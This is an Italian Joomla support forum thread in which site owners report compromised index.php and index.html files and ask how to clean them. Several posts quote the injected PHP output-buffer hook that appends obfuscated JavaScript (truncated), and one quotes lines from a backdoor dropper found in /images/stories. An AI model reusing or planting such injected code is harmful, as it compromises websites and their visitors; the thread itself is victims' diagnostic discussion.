Autore Topic: <?php ob_start('security_update'); nell'index.php e index2.php  (Letto 5695 volte)

Offline elasticgirl

  • Nuovo arrivato
  • *
  • Post: 26
  • Sesso: Femmina
  • Una tira l'altra :)
    • Mostra profilo
Salve,
Nei file index.php e index2.php ho trovato come prima riga:
Codice: [Seleziona]
<?php ob_start('security_update'); function security_update($buffer){return $buffer.'<script language="javascript">var ez=window;function asd(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}var sdkajsnd=String.fromCharCode(101,118,97)+"l";function fds(){return asd($a);}var $a="Z64zZ3
cut
v7Z3c07
Non me ne sarei accorta se google webmaster tool non avessi bloccato la mia sitemap.xml.
Andando a verificare il componente xmap in preferenze mi d questo errore:
Fatal error: Cannot redeclare security_update() (previously declared in /web/htdocs/www.settingweb.it/home/administrator/index2.php:1) in /web/htdocs/www.settingweb.it/home/administrator/index.php  on line 1
effettivamente c' quella linea di codice che vi ho posto prima.
DOMANDA: un bug del Joomla 1.5.15 oppure un attacco via ftp?? Come risolvere il problema??
« Ultima modifica: 27 Mag 2010, 11:45:21 da 56francesco »
Servizi Web Personalizzati OpenSource Low Cost

mau_develop

  • Visitatore
Re:<?php ob_start('security_update'); nell'index.php e index2.php
« Risposta #1 il: 27 Mag 2010, 09:42:53 »
postando nella sezione opportuna e prima ancora di farlo leggendo quelli che hanno lo stesso problema.

M.

Offline sgherzo

  • Nuovo arrivato
  • *
  • Post: 4
  • "fatti non foste a viver come bruti ... "
    • Mostra profilo
Re:<?php ob_start('security_update'); nell'index.php e index2.php
« Risposta #2 il: 08 Giu 2010, 16:39:46 »
stesso problema,
ma non c' 1 sezione dedicata alla sicurezza?

Offline maicolstaip

  • Global Moderator
  • Instancabile
  • ********
  • Post: 17623
  • Sesso: Maschio
    • Mostra profilo
Re:<?php ob_start('security_update'); nell'index.php e index2.php
« Risposta #3 il: 08 Giu 2010, 16:45:48 »
S,
c' una sezione dedicata alla sicurezza.
Si chiama "Sicurezza"  ::)

Sposto il messaggio in detta sezione.
Non si risponde a PM tecnici. Postate sul forum. Grazie.

Offline mxgs

  • Nuovo arrivato
  • *
  • Post: 5
    • Mostra profilo
Re:<?php ob_start('security_update'); nell'index.php e index2.php
« Risposta #4 il: 08 Giu 2010, 18:33:17 »
ho scoperto lo stesso problema anch'io. tutti i files index con estensione php sono stati "infettati" con 'sto codice bastardo.

il sito stato segnalato da Google come a rischio, con tanto di finestra rossa su FireFox.

ho rimosso tutte le occorrenze dello script (sembra che i files index.html non siano stati toccati) e fatto una ricerca su Google per saperne di pi. qualcuno afferma che potrebbe essere lo stesso server ad essere stato infettato: elasticgirl, per caso anche il tuo su un server *** che inizia per AR e finisce per BA - che il nome di un'isola"? (non lo si pu scrivere, a quanto pare, 'sto nome) ***

UPDATE
mi correggo: ho appena trovato lo script dentro il file /components/index.html, quindi anche i files html sono stati infettatti...

UPDATE 2
ho trovato 2 files mooolto sospetti in /images/stories
i nomi sono:
- sets.php
- storieslist.php
ins sets.php alcune linee del codice dicono:
Codice: [Seleziona]
if (!file_write("./unknown.php",$unk,1))exit("yazamadim\n<br>");
else echo "backdoor writed\n<br>";
il che mi fa sospettare che il nostro amico s' aperto una backdoor nel sito, o qualcosa di simile...
boh, come ha fatto non lo so...
« Ultima modifica: 08 Giu 2010, 18:55:59 da mxgs »

Offline liberatiarts

  • Appassionato
  • ***
  • Post: 203
  • Sesso: Maschio
    • Mostra profilo
Re:<?php ob_start('security_update'); nell'index.php e index2.php
« Risposta #5 il: 10 Giu 2010, 16:49:23 »
Premetto che ho una decina di siti ospitati dal medesimo provider e in uno si presentato lo stesso problema esposto in questa discussione, nel sito in questione sono stati sovrascritti i file index.php e index2.php sia nella root che in admin, e anche tutti i file index.html situati nelle cartelle principali di joomla -e  inoltre nella parte amministrativa in CONFIGURAZIONE FTP  dove normalmente vuoto era presente come user: user e una password  -che poi ho cancellato-  Ho trovato tutti file modificati controllando le date delle modifiche (risalenti al il 2 giugno ... ero in ferie)  ho sovrascritto tutti i file infetti e aggiornato alla xx.18 - cambiato tutte le psw - Ora ancora off-line e a parte l'avviso di firfox-google ancora attivo, il sito sembra ok (con IE lo  vedo senza avvisi o richieste di istallazione o allarmi dell'antivirus )   ma mi rimane il dubbio se occorre fare ulteriori operazioni sul data base o dove?? -  Chi ha risolto il problema, con quali modalit ? e principalmente se conosce anche la causa di questa intrusione  ?? Non vorrei avere gli stessi problemi con gli altri siti o almeno prevenirli   
Grazie !

mau_develop

  • Visitatore
Re:<?php ob_start('security_update'); nell'index.php e index2.php
« Risposta #6 il: 10 Giu 2010, 18:08:43 »
se cerchi invece di appenderti ai post degli altri risolvi e comprendi anche tu, la sezione piena di casi come il tuo

M.

Offline liberatiarts

  • Appassionato
  • ***
  • Post: 203
  • Sesso: Maschio
    • Mostra profilo
Re:<?php ob_start('security_update'); nell'index.php e index2.php
« Risposta #7 il: 10 Giu 2010, 22:06:53 »
Grazie troppo gentile!

 

Host

Torna su